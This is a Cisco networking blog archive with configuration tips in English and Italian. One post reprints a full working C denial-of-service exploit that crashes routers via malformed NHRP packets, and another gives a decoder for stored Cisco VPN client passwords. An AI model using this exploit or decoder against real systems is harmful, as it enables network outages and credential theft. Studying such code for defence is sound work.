Cisco on Details...

Telecom Italia - IPv6 Pilot on Cisco

Fri, 08 Jun 2012 23:44:20 +0000

To my amazement, Telecom Italia released a pilot project of IPv6 deployment on residential/dynamic ip only adsl internet access, but on theirs support site there’s configuration only for some useless systems. So, I’ve decided to write a configuration for Cisco platform.

Usually the typical Telecom Italia PPPoE or PPPoA ADSL connection with dynamic IPv4 only was authenticated with “aliceadsl” as user and password, now with bran new credential along IPv4 the endpoint router advertise a IPv6 /64 class (always dynamic).

username: adsl@alice6.it password: IPV6@alice6

And now IOS configuration:

- ATM inteface:

interface ATM0/0/0
no ip address
atm restart timer 300
no atm ilmi-keepalive
dsl operating-mode auto
hold-queue 100 in
!
interface ATM0/0/0.1 point-to-point
pvc 8/35
vbr-nrt 380 380
oam-pvc manage
encapsulation aal5mux ppp dialer
dialer pool-member 1

- Dialer inteface:

interface Dialer0
mtu 1492
ip address negotiated
ip nbar protocol-discovery
ip flow ingress
ip virtual-reassembly
encapsulation ppp
dialer pool 1
dialer-group 1
ipv6 address autoconfig
ipv6 enable
no cdp enable
ppp authentication chap callin
ppp chap hostname adsl@alice6.it
ppp chap password 0 IPV6@alice6
ppp pap sent-username adsl@alice6.it password 0 IPV6@alice6

- Route configuration:

ip route 0.0.0.0 0.0.0.0 Dialer0
ipv6 route 2000::/3 Dialer0

You can check with following command:

route01#sh ip int brief | sec Dialer0
Dialer0                    XXX.XXX.XXX.XXX    YES IPCP   up                    up
route01#sh ipv6 int brief | sec Dialer0
Dialer0                    [up/up]
FE80::1
2A01:2003:xxxx:xxxx::1

You can discover your /64 assigned class with:

route01#sh ipv6 int di0 | sec Global
 Global unicast address(es):
 2A01:2003:xxxx:xxxx::1, subnet is 2A01:2003:xxxx:xxxx::/64 [PRE]
 valid lifetime 2591993 preferred lifetime 604793
 route01#

I’ve left out NAT and other further configuration.

Update: prefix delegation

Cisco - service config

Mon, 26 Apr 2010 15:32:26 +0000

Randomly, during bootup of Cisco hardware (IOS), error messages similar to these are displayed:

%Error opening tftp://255.255.255.255/network-confg (Socket error)

%Error opening tftp://255.255.255.255/cisconet.cfg (Socket error)

%Error opening tftp://255.255.255.255/hostname-confg (Socket error)

%Error opening tftp://255.255.255.255/hostname.cfg (Socket error)

These error messages are related to the default service configuration option built into Cisco IOS software, which attempts to access the service configuration files from a network Trivial File Transfer Protocol (TFTP) server.

In order to disable this feature, issue the no service config global command.

Router#config terminal
Enter configuration commands, one per line.
Router(config)#no service config
Router(config)#exit
Router#copy running-config startup-config`
``

Cisco - ATM Clockrate

Wed, 21 Apr 2010 15:09:18 +0000

If you have performance problem on Cisco 1721, Cisco 2610XM-2651XM, Cisco 2691, and Cisco 3660, with WIC-1DSL - IOS 12.3(2) or above, probably depends on the default value associated with ALL5 clockrate.

If yuo wanna check type the following command on your router:

hellroute01#show controller atm0/0 | include ATM0/0
Interface: ATM0/0, Hardware: DSLSAR (with Alcatel ADSL Module), State: up
SCC0 =  2600000 (ATM0/0)
SCC3 = 1000000 (ATM0/0)
hellroute01#

If you get 2600000 (default value) on SCC0 or SCC1 your downlink speed rate probably is limitated at about 300 KB/s

For get full speed, put max supported value on aal5 clockrate like this:

hellroute01(config)#int atm0/0
 hellroute01(config-if)#clock rate aal5 ?
 1000000
 1300000
 1600000
 2000000
 2600000 (default)
 3200000
 4000000
 5300000
 7000000
<1000000-7000000>  clock rates in bits per second, choose one from above
hellroute01(config-if)#clock rate aal5 7000000

Becareful the atm interface is automatically restart for apply the change. Then you lost connection on this interface.

Cisco - ASA/PIX enable ASDM

Thu, 17 Sep 2009 14:49:16 +0000

fw01a> enable
Password:
fw01a# configure terminal
fw01a(Config)# interface ethernet1
fw01a(Config-if)# nameif inside
fw01a(Config-if)# ip address 192.168.1.1 255.255.255.0
fw01a(Config-if)# no shutdown
fw01a(Config-if)#

Activate ASDM and enable http server.

fw01a(Config)# asdm image flash:/asdm.bin.
fw01a(Config)# http server enable.

Open a connection for your inside network.

fw01a(Config)# http 192.168.1.0 255.255.255.0 inside

Make sure all your config running properly.

fw01a(Config)# show running http
http server enabled
http 192.168.1.0 255.255.255.0 inside
fw01a(Config)#

Now your Cisco ASA/PIX can be access from your PC, open your web browser then enter this address https://192.168.1.1/admin

Cisco DMVPN/NBMA - Security

Wed, 16 Sep 2009 01:54:46 +0000

I’m working on experimental wide lab network based on DMVPN/NBMA, with some friends, dynamic multipoing vpn is seem a great solution, looks like a cheap frame relay infrastructure over internet.

Now the problem: what about security? especially in dynamical wan ip address envivorment durin spoke-spoke communication, is impossible define security rule on GRE level.

Solution: I’m thinking about…

Only for testing purpose, I find this exploit:

/******************************************************************************/
/*                                                                            */
/* nhrp-dos - Copyright by Martin Kluge, <mk@elxsi.de>                        */
/*                                                                            */
/* Feel free to modify this code as you like, as long as you include the      */
/* above copyright statement.                                                 */
/*                                                                            */
/* Please use this code only to check your OWN cisco routers.                 */
/*                                                                            */
/* Cisco bug ID: CSCin95836                                                   */
/*                                                                            */
/* The Next-Hop-Resolution Protocol (NHRP) is defined in RFC2332. It is used  */
/* by a source host/router connected to a Non-Broadcast-Multi-Access (NBMA)   */
/* subnetwork to determine the internetworking layer address and NBMA         */
/* subnetwork addresses of the NBMA next hop towards the destination.         */
/* NHRP is often used for dynamic multipoint VPNs (DMVPN) in combination with */
/* IPSEC.                                                                     */
/*                                                                            */
/* URLs:                                                                      */
/* - [RFC2332/NHRP]       http://rfc.net/rfc2332.html                         */
/* - [RFC1701/GRE]        http://rfc.net/rfc1701.html                         */
/* - [DMVPNs with Cisco]  http://www.cisco.com/en/US/tech/tk583/tk372/techno  */
/*                        logies_white_paper09186a008018983e.shtml            */
/*                                                                            */
/* This code was only tested on FreeBSD and Linux, no warranty is or will be  */
/* provided.                                                                  */
/*                                                                            */
/* Vulnerable images (tested):                                                */
/*                                                                            */
/*  - c7100-jk9o3s-mz.123-12e.bin                                             */
/*  - c7200-jk8o3s-mz.122-40.bin                                              */
/*  - c3640-js-mz.122-15.T17.bin                                              */
/* (and many other IOS versions on different platforms)                       */
/*                                                                            */
/* Vulnerable configuration on cisco IOS:                                     */
/*                                                                            */
/* interface Tunnel0                                                          */
/*  ip address 10.0.0.1 255.255.255.128                                       */
/*  no ip redirects                                                           */
/*  no ip proxy-arp                                                           */
/*  ip mtu 1464                                                               */
/*  ip nhrp authentication mysecret                                           */
/*  ip nhrp network-id 1000                                                   */
/*  ip nhrp map multicast dynamic                                             */
/*  ip nhrp server-only                                                       */
/*  ip nhrp holdtime 30                                                       */
/*  tunnel source FastEthernet0/0                                             */
/*  tunnel mode gre multipoint                                                */
/*  tunnel key 123456789                                                      */
/*                                                                            */
/* This exploit works even if "ip nhrp authentication" is configured on the   */
/* cisco router. You can also specify a GRE key (use 0 to disable this        */
/* feature) if the GRE tunnel is protected. You don't need to know the        */
/* NHRP network id (or any other configuration details, except the GRE key if */
/* it is set on the target router).                                           */
/*                                                                            */
/* NOTE: The exploit only seems to work, if a NHRP session between the target */
/*       router and at least one client is established.                       */
/*                                                                            */
/* Code injection is also possible (thanks to sky for pointing this out), but */
/* it is not very easy and depends heavily on the IOS version / platform.     */
/*                                                                            */
/* Example:                                                                   */
/* root@elxsi# ./nhrp-dos vr0 x.x.x.x 123456789                               */
/*                                                                            */
/* Router console output:                                                     */
/*                                                                            */
/* -Traceback= 605D89A0 605D6B50 605BD974 605C08CC 605C2598 605C27E8          */
/* $0 : 00000000, AT : 62530000, v0 : 62740000, v1 : 62740000                 */
/* <snip>                                                                     */
/* EPC : 605D89A0, ErrorEPC : BFC01654, SREG : 3400FF03                       */
/* Cause 00000024 (Code 0x9): Breakpoint exception                            */
/*                                                                            */
/* Writing crashinfo to bootflash:crashinfo_20070321-155011                   */
/* === Flushing messages (16:50:12 CET Wed Mar 21 2007) ===                   */
/*                                                                            */
/* Router reboots or sometimes hangs ;)                                       */
/*                                                                            */
/*                                                                            */
/* Workaround: Disable NHRP ;)                                                */
/*                                                                            */
/* I'd like to thank the Cisco PSIRT and Clay Seaman-Kossmey for their help   */
/* regarding this issue.                                                      */
/*                                                                            */
/* Greetings fly to: sky, chilli, arbon, ripp, huega, gh0st, argonius, s0uls, */
/*                   xhr, bullet, nanoc, spekul, kaner, d, slobo, conny, H-Ra */
/*                   and #infiniteVOID                                        */
/*                                                                            */
/******************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
/* BSD */
#define _BSD
/* Header sizes */
#define IP_HDR_SIZE     20
#define GRE_HDR_SIZE    4
#define GRE_KEY_SIZE    4
#define NHRP_HDR_SIZE   62
/* Function prototypes */
int open_socket (void);
int close_socket (int);
int send_dos(int, unsigned long, unsigned long, unsigned long);
unsigned long resolve_ip (char *);
unsigned long get_int_ipv4 (char *);
/* Globals */
int sockfd;
int nhrp_req_id;
/* GRE header */
struct gre_h {
unsigned short flags;   /* GRE flags */
unsigned short ptype;   /* GRE protocol type */
unsigned int   key;     /* GRE key */
};
/* NHRP header */
struct nhrp_h {
/* NHRP fixed header (20 bytes) */
struct {
unsigned short afn;             /* NHRP AFN */
unsigned short proto;           /* NHRP protocol type */
unsigned int   snap;            /* NHRP SNAP */
unsigned short snapE:8;         /* NHRP SNAP */
unsigned short hops:8;          /* NHRP hop count */
unsigned short length;          /* NHRP total length */
unsigned short checksum;        /* NHRP checksum */
unsigned short mpoa_ext;        /* NHRP MPOA extensions */
unsigned short version:8;       /* NHRP version */
unsigned short type:8;          /* NHRP type */
unsigned short nbma_addr:8;     /* NHRP t/l of NBMA address */
unsigned short nbma_sub:8;      /* NHRP t/l of NBMA subaddr */
} fixed;
/* NHRP mandatory part */
struct {
unsigned short src_len:8;       /* NHRP src protocol length */
unsigned short dst_len:8;       /* NHRP dest protocol length */
unsigned short flags;           /* NHRP flags */
unsigned int   request_id;      /* NHRP request ID */
unsigned long  client_nbma;     /* NHRP client NBMA address */
unsigned long  client_nbma_sub; /* NHRP client NBMA subaddr */
unsigned long  client_pro_addr; /* NHRP client protocol addr */
} mand;
/* NHRP client information entries (CIE) */
union {
struct {
unsigned short code:8;          /* NHRP code */
unsigned short pref_len:8;      /* NHRP prefix length */
unsigned short reserved;        /* NHRP reserved */
unsigned short mtu;             /* NHRP MTU */
unsigned short holding_time;    /* NHRP holding time */
unsigned short len_client:8;    /* NHRP t/l cl addr */
unsigned short len_client_sub:8;/* NHRP t/l cl sub */
unsigned short len_client_pro:8;/* NHRP t/l cl pro */
unsigned short preference:8;    /* NHRP preference */
unsigned short ext;             /* NHRP extension */
} cie;
};
};
/* Main function */
int main (int argc, char **argv) {
/* Check command line */
if(argc != 4) {
fprintf(stderr, "\nnhrp-dos (c) by Martin Kluge <mk@elxsi.de>, 2007\n");
fprintf(stderr, "------------------------------------------------\n");
fprintf(stderr, "Usage: ./nhrp-dos <device> <target> <GRE key>\n");
fprintf(stderr, "(Set GRE key = 0 to disable GRE keys!)\n\n");
exit(EXIT_FAILURE);
}
/* Check UID */
if(getuid() != 0 && geteuid() != 0) {
fprintf(stderr, "Error: Please run as root!\n");
exit(EXIT_FAILURE);
}
/* Open a socket */
sockfd = open_socket();
/* Send DoS packet */
send_dos(sockfd, get_int_ipv4(argv[1]), resolve_ip(argv[2]), atoi(argv[3]));
/* Close the socket */
close_socket(sockfd);
exit(EXIT_SUCCESS);
}
/* Open the socket */
int open_socket (void)
{
int fd;
int one = 1;
void *ptr = &one;
/* Open the socket */
fd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
if(fd < 0) {
fprintf(stderr, "Error: open_socket: Unable to open socket.\n");
exit(EXIT_FAILURE);
}
/* Set IP_HDRINCL to include the IPv4 header in outgoing packets. */
/* Otherwise it would be done by the kernel. */
if(setsockopt(fd, IPPROTO_IP, IP_HDRINCL, ptr, sizeof(one)) < 0) {
fprintf(stderr, "Error: open_socket: setsockopt failed.\n");
exit(EXIT_FAILURE);
}
#ifndef _BSD
if(setsockopt(fd, IPPROTO_IP, SO_BROADCAST, ptr, sizeof(one)) < 0) {
fprintf(stderr,"Error: open_socket: setsockopt failed.\n");
exit(EXIT_FAILURE);
}
#endif
return(fd);
}
/* Close the socket */
int close_socket (int fd)
{
return(close(fd));
}
/* Resolve the hostname to IP address */
unsigned long resolve_ip (char *host)
{
struct in_addr addr;
struct hostent *host_ent;
if((addr.s_addr = inet_addr(host)) == -1) {
if(!(host_ent = gethostbyname(host)))
return(-1);
memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length);
}
return(addr.s_addr);
}
/* Get IPv4 address of DEVICE */
unsigned long get_int_ipv4 (char *device)
{
int tmp_fd;
struct ifreq ifr;
struct sockaddr_in *sin;
tmp_fd = socket(PF_INET, SOCK_DGRAM, 0);
if(tmp_fd < 0) {
fprintf(stderr, "Error: get_int_ipv4: socket failed.\n");
exit(EXIT_FAILURE);
}
memset(&ifr, 0, sizeof(ifr));
sin = (struct sockaddr_in *) &ifr.ifr_addr;
strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name));
ifr.ifr_addr.sa_family = AF_INET;
if(ioctl(tmp_fd, SIOCGIFADDR, (char *) &ifr) < 0) {
fprintf(stderr, "Error: get_int_ipv4: ioctl failed.\n");
exit(EXIT_FAILURE);
}
close(tmp_fd);
return(sin->sin_addr.s_addr);
}
/* Send NHRP packet */
int send_dos (int fd, unsigned long src_ip, unsigned long dst_ip,
unsigned long gre_key)
{
struct ip ip_hdr;
struct ip *iphdr;
struct gre_h gre_hdr;
struct nhrp_h nhrp_hdr;
struct sockaddr_in sin;
unsigned int bytes = 0;
int GRE_SIZE = GRE_HDR_SIZE;
/* Packet buffer */
unsigned char *buf;
if(gre_key!=0)
GRE_SIZE+=GRE_KEY_SIZE;
/* Allocate some memory */
buf = malloc(IP_HDR_SIZE+GRE_SIZE+NHRP_HDR_SIZE);
if(buf < 0) {
fprintf(stderr, "Error: send_dos: malloc failed.\n");
exit(EXIT_FAILURE);
}
/* Increment NHRP request ID */
nhrp_req_id++;
/* IPv4 Header */
ip_hdr.ip_v             = 4;                    /* IP version */
ip_hdr.ip_hl            = 5;                    /* IP header length */
ip_hdr.ip_tos           = 0x00;                 /* IP ToS */
ip_hdr.ip_len           = htons(IP_HDR_SIZE  +
GRE_SIZE +
NHRP_HDR_SIZE
);                    /* IP total length */
ip_hdr.ip_id            = 0;                    /* IP identification */
ip_hdr.ip_off           = 0;                    /* IP frag offset */
ip_hdr.ip_ttl           = 64;                   /* IP time to live */
ip_hdr.ip_p             = IPPROTO_GRE;          /* IP protocol */
ip_hdr.ip_sum           = 0;                    /* IP checksum */
ip_hdr.ip_src.s_addr    = src_ip;               /* IP source */
ip_hdr.ip_dst.s_addr    = dst_ip;               /* IP destination */
/* GRE header */
if(gre_key != 0) {
gre_hdr.flags   = htons(0x2000);        /* GRE flags */
gre_hdr.key     = htonl(gre_key);       /* GRE key */
} else {
gre_hdr.flags   = 0;
}
gre_hdr.ptype           = htons(0x2001);        /* GRE type (NHRP) */
/* NHRP fixed header */
nhrp_hdr.fixed.afn      = htons(0x0001);        /* NHRP AFN */
nhrp_hdr.fixed.proto    = htons(0x0800);        /* NHRP protocol type */
nhrp_hdr.fixed.snap     = 0;                    /* NHRP SNAP */
nhrp_hdr.fixed.snapE    = 0;                    /* NHRP SNAP */
nhrp_hdr.fixed.hops     = 0xFF;                 /* NHRP hop count */
/* DoS -> Set length to 0xFFFF */
nhrp_hdr.fixed.length   = htons(0xFFFF);        /* NHRP length */
/* Checksum can be incorrect */
nhrp_hdr.fixed.checksum = 0;                    /* NHRP checksum */
nhrp_hdr.fixed.mpoa_ext = htons(0x0034);        /* NHRP MPOA ext */
nhrp_hdr.fixed.version  = 1;                    /* NHRP version */
nhrp_hdr.fixed.type     = 3;                    /* NHRP type */
nhrp_hdr.fixed.nbma_addr= 4;                    /* NHRP NBMA t/l addr */
nhrp_hdr.fixed.nbma_sub = 0;                    /* NHRP NBMA t/l sub */
/* NHRP mandatory part */
nhrp_hdr.mand.src_len   = 4;                    /* NHRP src proto len */
nhrp_hdr.mand.dst_len   = 4;                    /* NHRP dst proto len */
nhrp_hdr.mand.flags     = htons(0x8000);        /* NHRP flags */
nhrp_hdr.mand.request_id  = htonl(nhrp_req_id); /* NHRP request ID */
nhrp_hdr.mand.client_nbma = src_ip;             /* NHRP client addr */
nhrp_hdr.mand.client_nbma_sub = 0;              /* NHRP client sub  */
nhrp_hdr.mand.client_pro_addr = 0;              /* NHRP client proto */
/* NHRP client information entries (CIE) */
nhrp_hdr.cie.code       = 0;                    /* NHRP code */
nhrp_hdr.cie.pref_len   = 0xFF;                 /* NHRP prefix len */
nhrp_hdr.cie.reserved   = 0x0000;               /* NHRP reserved */
nhrp_hdr.cie.mtu        = htons(1514);          /* NHRP mtu */
nhrp_hdr.cie.holding_time = htons(30);          /* NHRP holding time */
nhrp_hdr.cie.len_client = 0;                    /* NHRP t/l client */
nhrp_hdr.cie.len_client_sub = 0;                /* NHRP t/l sub */
nhrp_hdr.cie.len_client_pro = 0;                /* NHRP t/l pro */
nhrp_hdr.cie.preference = 0;                    /* NHRP preference */
nhrp_hdr.cie.ext        = htons(0x8003);        /* NHRP C/U/Type (ext)*/
/* Copy the IPv4 header to the buffer */
memcpy(buf, (unsigned char *) &ip_hdr, sizeof(ip_hdr));
/* Copy the GRE header to the buffer */
memcpy(buf + IP_HDR_SIZE, (unsigned char *) &gre_hdr, sizeof(gre_hdr));
/* Copy the NHRP header to the buffer */
memcpy(buf + IP_HDR_SIZE + GRE_SIZE, (unsigned char *) &nhrp_hdr,
sizeof(nhrp_hdr));
/* Fix some BSD bugs */
#ifdef _BSD
iphdr = (struct ip *) buf;
iphdr->ip_len = ntohs(iphdr->ip_len);
iphdr->ip_off = ntohs(iphdr->ip_off);
#endif
memset(&sin, 0, sizeof(struct sockaddr_in));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = iphdr->ip_dst.s_addr;
printf("\nnhrp-dos (c) by Martin Kluge <mk@elxsi.de>, 2007\n");
printf("------------------------------------------------\n");
printf("Sending DoS packet...");
/* Send the packet */
bytes = sendto(fd, buf, IP_HDR_SIZE + GRE_SIZE + NHRP_HDR_SIZE, 0,
(struct sockaddr *) &sin, sizeof(struct sockaddr));
printf("DONE (%d bytes)\n\n", bytes);
/* Free the buffer */
free(buf);
/* Return number of bytes */
return(bytes);
}
// milw0rm.com [2007-08-09]

Download

cisco-decrypt.c

Thu, 20 Aug 2009 02:28:21 +0000

/* Decoder for password encoding of Cisco VPN client.
Copyright (C) 2005 Maurice Massar
Thanks to HAL-9000@evilscientists.de for decoding and posting the algorithm!This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
*/

/*
Requires libgcrypt version 1.1.90 or newer
Compile with:
gcc -Wall -o cisco-decrypt cisco-decrypt.c $(libgcrypt-config --libs --cflags)
Usage:
./cisco-decrypt DEADBEEF...012345678 424242...7261
*/
#include <stdio.h>
#include <stdlib.h>
#include <gcrypt.h>
#include <errno.h>
int hex2bin_c(unsigned int c)
{
if ((c >= '0')&&(c <= '9'))
return c - '0';
if ((c >= 'A')&&(c <= 'F'))
return c - 'A' + 10;
if ((c >= 'a')&&(c <= 'f'))
return c - 'a' + 10;
return -1;
}
int hex2bin(const char *str, char **bin, int *len)
{
char *p;
int i, l;
if (!bin)
return EINVAL;
for (i = 0; str[i] != '\0'; i++)
if (hex2bin_c(str[i]) == -1)
return EINVAL;
l = i;
if ((l & 1) != 0)
return EINVAL;
l /= 2;
p = malloc(l);
if (p == NULL)
return ENOMEM;
for (i = 0; i < l; i++)
p[i] = hex2bin_c(str[i*2]) << 4 | hex2bin_c(str[i*2+1]);
*bin = p;
if (len)
*len = l;
return 0;
}
int c_decrypt(char *ct, int len, char **resp, char *reslenp)
{
const char *h1  = ct;
const char *h4  = ct + 20;
const char *enc = ct + 40;
char ht[20], h2[20], h3[20], key[24];
const char *iv = h1;
char *res;
gcry_cipher_hd_t ctx;
int reslen;
if (len < 48)
return 0;
len -= 40;
memcpy(ht, h1, 20);
ht[19]++;
gcry_md_hash_buffer(GCRY_MD_SHA1, h2, ht, 20);
ht[19] += 2;
gcry_md_hash_buffer(GCRY_MD_SHA1, h3, ht, 20);
memcpy(key, h2, 20);
memcpy(key+20, h3, 4);
/* who cares about parity anyway? */
gcry_md_hash_buffer(GCRY_MD_SHA1, ht, enc, len);
if (memcmp(h4, ht, 20) != 0)
return -1;
res = malloc(len);
if (res == NULL)
return -1;
gcry_cipher_open(&ctx, GCRY_CIPHER_3DES, GCRY_CIPHER_MODE_CBC, 0);
gcry_cipher_setkey(ctx, key, 24);
gcry_cipher_setiv(ctx, iv, 8);
gcry_cipher_decrypt(ctx, (unsigned char *)res, len, (unsigned char *)enc, len);
gcry_cipher_close(ctx);
reslen = len - res[len-1];
res[reslen] = '\0';
if (resp)
*resp = res;
if (reslenp)
*reslenp = reslen;
return 0;
}
int main(int argc, char *argv[])
{
int i, len, ret = 0;
char *bin, *pw;
gcry_check_version(NULL);
for (i = 1; i < argc; i++) {
ret = hex2bin(argv[i], &bin, &len);
if (ret != 0) {
perror("decoding input");
continue;
}
ret = c_decrypt(bin, len, &pw, NULL);
free(bin);
if (ret != 0) {
perror("decrypting input");
continue;
}
printf("%s\n", pw);
free(pw);
}
exit(ret != 0);
}
Download: cisco-decrypt

Cisco ASA - Enable SSH

Thu, 06 Aug 2009 00:32:57 +0000

If you have tried to setup SSH access on a new ASA, it might not have worked the way you wanted. That is because the RSA keys need to be generated first. To do that:

from configure terminal:

fw01/act(config)# crypto key generate rsaINFO: The name for the keys will be:
Keypair generation process begin. Please wait…

And then configure SSH to be allowed from the inside interface:

fw01/act(config)# ssh (inser your ip) (insert your netmask) outside

Now you can configure AAA and setup your own username.

First, a username needs to be created:

fw01/act(config)# username leonardo password mypassword privilege 15

And then configure AAA:

fw01/act(config)# aaa authentication ssh console LOCAL

Cisco - Autosave scp

Wed, 01 Jul 2009 19:15:31 +0000

Non ho mai trovato la giusta implementazione per usarla, ma questo dovrebbe copiare la configurazione di apparati cisco automaticamente ad ogni salvataggio:

archive
path scp://leo:xxxxxx@hostname/home/leo/router-backups/router
write-memory

Mac OS X - Cisco VPN Client

Mon, 27 Apr 2009 02:16:09 +0000

If you are running Cisco’s VPN Client on Mac OSX, you might be familiar with (or tormented by) “Error 51: Unable to communicate with the VPN subsystem”. The simple fix is to quit VPN Client, open a Terminal window, (Applications -> Utilities -> Terminal) and type the following from root user:

# /System/Library/StartupItems/CiscoVPN/CiscoVPN restart

Stopping Cisco Systems VPN Driver
kextunload: unload kext /System/Library/Extensions/CiscoVPN.kext succeeded
Starting Cisco Systems VPN Driver
kextload: /System/Library/Extensions/CiscoVPN.kext loaded successfully

Cisco - page breaks

Mon, 13 Apr 2009 19:14:27 +0000

On Router IOS:

To stop the page breaks:

# terminal length 0

To resume them:

# terminal no length 0 (or number ex. 24)

On Pix/ASA: To stop the page breaks.

# no pager

To resume them:

# pager 24

Cisco - Get & Save config using telnet

Mon, 13 Apr 2009 19:08:14 +0000

Vi è mai capitato di dover salvare delle configurazione da apparati cisco senza avere un tftp a disposizione?

In aiuto un piccolo script:

#!/bin/bash
host=xx.xx.xx.xx
port=23
login=user
passwd=pass
nobreak='terminal length 0'
cmd='show running-config all'
(echo open ${host} ${port}
sleep 1
echo ${login}
sleep 1
echo ${passwd}
sleep 1
echo ${nobreak}
sleep 1
echo ${cmd}
sleep 30
echo exit) | telnet sw01.txt

Link - Catalyst 4224 Access Gateway Switch Software Configuration Guide - Traffic Shaping [Cisco Catalyst 4200 Series Switches] - Cisco Systems

Mon, 02 Feb 2009 01:03:35 +0000

Catalyst 4224 Access Gateway Switch Software Configuration Guide - Traffic Shaping [Cisco Catalyst 4200 Series Switches] - Cisco Systems.

Cisco - Catalyst Shaping/Ratelimit

Fri, 26 Dec 2008 03:27:42 +0000

Questo è il metodo per fare un sorta di shaping/ratelimit sui catalyst 29xx sul traffico in ingresso su una determinata porta dello switch questo è utile c’è la necessità di limitare la banda in upload di un server, su questa serie c’è però un limite di step di 1Mbit/s nonstante l’immagine Lite o Lanbase il discorso non cambia. Questo sistema non permette di avere una situazione simmetrica quindi il traffico in uscita si può molto molto grezzamente limitare con un’altro sistema che descriverò in seguito.

Prima cosa creare una classmap con associata un acl:

class-map match-all M_P00
match access-group name A_P00

Seconda cosa definire la policy, che contiene l’associazione alla classmap:

policy-map P_P00
class M_P00
police 3000000 64000 exceed-action drop

La sintassi è “police” numero di banda allocata espressa in Bits/s, numero di burst espresso in Bytes poi l’azione in caso il limite venga superato nel mio caso sono 3Mbit/s con bust di 62 Kbyte

Terza cosa associamo la policy alla porta specifica dello switch:

interface FastEthernet0/1
service-policy input P_P00

Ultima cosa, l’acl ne mio caso seleziona tutto il traffico:

ip access-list extended A_P00
permit ip any any

Questo è un sistema grezzo per fare un ratelimit del traffico in uscita dallo switch:

interface FastEthernet0/1
srr-queue bandwidth limit 10

La parte numerica della sintassi è espressa in % sulla velocità della porta.

Cisco Acquires Jabber, Inc.

Sun, 09 Nov 2008 05:39:14 +0000

Questa mi suona propio nuova eppure è una notizia di qualche settimana fa, Cisco ha acquisito Jabber.

Ma che sta succedendo?

More info:

http://www.cisco.com/web/about/ac49/ac0/ac1/ac258/JabberInc.html

Cisco - ATM Line Status

Tue, 21 Oct 2008 23:40:33 +0000

Breve memo sul comando per l’analisi dello stato del modulo ATM per le linea adsl in caso di problemi e’ sempre bene verificare i livelli di attenuazione e margine di rumore della linea al fine di valutare la qualita’ del segnale della linea.

router# show dsl interface atm0/0

Cisco - SSH

Wed, 15 Oct 2008 21:45:30 +0000

Ecco come abilitare, l’ssh sugli apparati con cisco con IOS

Prima fase configurare un dominio, e generare i certificati, al fine di incrementare la sicurezza consiglio di usare almeno la chiave 768 Bit che permette l’uso di SSH v2

 route_01_no#conf t
 Enter configuration commands, one per line. End with CNTL/Z.
 route_01_no(config)#ip domain-name stars.deepreflect.net
 route_01_no(config)#cry key generate rsa

 The name for the keys will be: route_01_no.stars.deepreflect.net
 Choose the size of the key modulus in the range of 360 to 2048 for your
 General Purpose Keys. Choosing a key modulus greater than 512 may take
 a few minutes.

 How many bits in the modulus [512]: 768
 % Generating 768 bit RSA keys, keys will be non-exportable...[OK]

La seconda fase e’ abilitare il protocollo SSH v2 e abilitare le line vty all’accesso:

Cisco - Lock & Key

Sun, 12 Oct 2008 20:04:09 +0000

Discutendo una sera sulla sicurezza dei servizi SSH e sull’alternativa di utilizzare porte non standard per ovviare ai frequenti tentativi di instrusione automatici effettuati da bot, l’idea e’ offuscare la porta 22 con stratagemmi simili a port knocking, IOS a riguardo puo’ essere sfruttato con una funzione chiamata Lock & Key si tratta di condizionare una ACL per un tempo limitato per mezzo di autenticazione.

Il meccanismo puo’ essere integrato su router di confine o router di accesso che abbiamo autenticazione locale o TACAS+

Prima fase e’ abilitare e definire il metodo di autenticazione, in questo esempio e’ locale sul router nel caso ci sia un server ACS specificare i parametri.

aaa new-model
aaa authentication login userauthen local
aaa authentication login clientauth local
aaa authorization network groupauthor local

Seconda fase definire almeno un utente:

username cisco privilege 15 password cisco

Terza fase applicare un gruppo all’interfaccia di ingresso:

interface FastEthernet0/0
ip access-group 150 in

Quarta fase definire l’access list, la prima abilita il telnet, la seconda abilita l’ssh in condizione di autenticazione posiva, e lascia attiva la regola per 120 secondi dopo che connesione viene chiusa:

access-list 150 permit tcp any any eq telnet
access-list 150 dynamic TL01 timeout 120 permit tcp any any eq 22

Quinta fase definire l’autocommad nella sezione terminali virtuali, nel caso specifico se si esegue un login via telnet si attiva l’ACL, per la gestione del router sono dedicate le line SSH

line vty 0 4
 privilege level 15
 autocommand  access-enable timeout 5
 transport input telnet
line vty 5 9
 privilege level 15
 transport input ssh

Cisco - Kerberos and telnet

Sun, 07 Sep 2008 19:51:39 +0000

Questa e’ una cosa che spesso riguarda piu’ in client telnet che non gli OS Cisco, che durante la procedura di login tentano la procedura di automatic login, generando questo questo errore:

leobook:~ leonardorizzi$ telnet route01-nov.stars.deepreflect.net

Trying xxx.xxx.xxx.xxx...
Connected to route01-nov.stars.deepreflect.net.
Escape character is '^]'.

User Access Verification

Username: Kerberos:     No default realm defined for Kerberos!

Questo ovviamente deriva dalla mancanza di configurazione dell’autenticazione kerberos sul sistema, cosa che ovviamente non e’ strettamente necessaria; Per evitare di vedere e creare nei log righe di errore, semplicemente basta usare il parametro -K di telnet che corrisponde citando il man “-K Specifies no automatic login to the remote system.”

leobook:~ leonardorizzi$ telnet -K route01-nov.stars.deepreflect.net
Trying xxx.xxx.xxx.xxx...
Connected to route01-nov.stars.deepreflect.net.
Escape character is '^]'.

User Access Verification

Username:

Altra alternativa disattivare l’autologin dalle impostazioni di telnet con:

leobook:~ leonardorizzi$ echo default unset autologin >~/.telnetrc

Cisco - Change Dynamic NAT

Sun, 07 Sep 2008 19:33:21 +0000

Vi sara’ mai capitato di dover riconfigurare il NAT, Route MAP o simili su router in condizioni di nat dinamico, nella maggior parte dei casi si ricevono questi errori:

Dynamic mapping in use, cannot remove
%Pool outpool in use, cannot destroy

Si risolve usando il comando “clear” nello specifico:

